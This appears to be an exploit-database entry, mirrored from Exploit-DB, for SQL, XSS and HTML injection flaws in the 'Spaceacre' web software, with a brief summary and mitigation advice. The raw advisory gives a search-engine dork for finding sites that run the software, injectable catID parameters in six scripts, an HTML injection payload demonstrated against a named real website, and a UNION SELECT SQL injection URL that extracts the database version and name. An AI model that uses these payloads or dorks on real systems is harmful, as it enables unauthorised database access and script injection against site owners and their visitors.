header-logo
Suggest Exploit
vendor:
Spaceacre
by:
XroGuE
8,8
CVSS
HIGH
SQL/XSS/HTML Injection
89, 79, 80
CWE
Product Name: Spaceacre
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities

Spaceacre is vulnerable to SQL/XSS/HTML injection. An attacker can inject malicious SQL/XSS/HTML code into the vulnerable parameters of the application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, to disclose sensitive information from the database, to execute arbitrary HTML and script code in the browser of the victim, to bypass authentication and authorization mechanisms, and to perform a wide range of other malicious activities.

Mitigation:

Input validation should be used to prevent SQL/XSS/HTML injection attacks. The application should also be configured to use the least privileged account with the least privileges necessary to perform its function.
Source

Exploit-DB raw data:

=========================================================
Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
=========================================================
#########################################
# Name: Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
# Vendor: http://www.spaceacre.com
# Date: 2010-05-26
# Author: XroGuE
# Thanks to: Inj3ct0r.com [R0073r],Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
##########################################

[+] Dork: intext:"Designed by Spaceacre"

[+] Vulnerabilities:

#http://[target]/cat1.php?catID=[SQL/XSS/HTML]
#http://[target]/cat2.php?catID=[SQL/XSS/HTML]
#http://[target]/cat3.php?catID=[SQL/XSS/HTML]
#http://[target]/cat4.php?catID=[SQL/XSS/HTML]
#http://[target]/cat5.php?catID=[SQL/XSS/HTML]
#http://[target]/cat6.php?catID=[SQL/XSS/HTML]


[+] XSS InjecTion Vulnerability:

[+] Live Demo: http://www.baselinengn.com/cat1.php?catID=
http://server/cat2.php?catID=
http://server/cat3.php?catID=
http://server/cat4.php?catID=

###########################################

[+] HTML InjecTion Vulnerability:

[+] Live Demo: http://www.baselinengn.com/cat1.php?catID=<font color=red size=15>XroGuE</font>
http://server/cat2.php?catID=<font color=red size=15>XroGuE</font>
http://server/cat3.php?catID=<font color=red size=15>XroGuE</font>
http://server/cat4.php?catID=<font color=red size=15>XroGuE</font>

###########################################

[+] SQL InjecTion Vulnerability:

[+] Live Demo : http://server/cat1.php?catID=-999+union+all+select+1,version(),database()--

###########################################